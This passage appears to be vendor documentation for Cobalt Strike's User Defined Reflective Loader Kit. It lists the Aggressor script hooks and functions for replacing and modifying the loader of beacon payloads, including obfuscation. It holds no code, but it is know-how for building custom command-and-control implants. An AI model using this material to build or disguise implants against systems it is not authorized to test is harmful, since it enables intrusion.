Cobalt Strike 4.4 added support for using customized reflective loaders for beacon payloads. The User Defined Reflective Loader (UDRL) Kit is the source code for the UDRL example. Go to Help -> Arsenal and download the UDRL Kit. Your licence key is required.
The reflective loader's executable code is the extracted .text section from a user provided compiled object file.
The extracted executable code must be less than 5kb.
Aggressor script hooks are provided to allow implementation of User Defined Reflective Loaders.
|BEACON_RDLL_GENERATE||Hook used to implement basic Reflective Loader replacement.|
|BEACON_RDLL_GENERATE_LOCAL||Hook used to implement advanced Reflective Loader replacement. Additional arguments provided include Beacon ID, GetModuleHandleA address, and GetProcAddress address.|
Aggressor script functions are provided to extract the Reflective Loader executable code (.text section) from a compiled object file and insert the executable code into the beacon payload.
|extract_reflective_loader||Extracts the Reflective Loader executable code from a byte array containing a compiled object file.|
|setup_reflective_loader||Inserts the Reflective Loader executable code into the beacon payload.|
Aggressor script functions are provided to obtain information about the beacon payload to assist with custom modifications to the payload.
|pedump||Loads a map of information about the beacon payload. This map information is similar to the output of the "peclone" command with the "dump" argument.|
Aggressor script functions are provided to perform custom modifications to the beacon payload.
Depending on the custom modifications made (obfuscation mask, etc...), the reflective loader may have to reverse those modifications when loading.
|Function (See the Aggressor Script function help for more information)|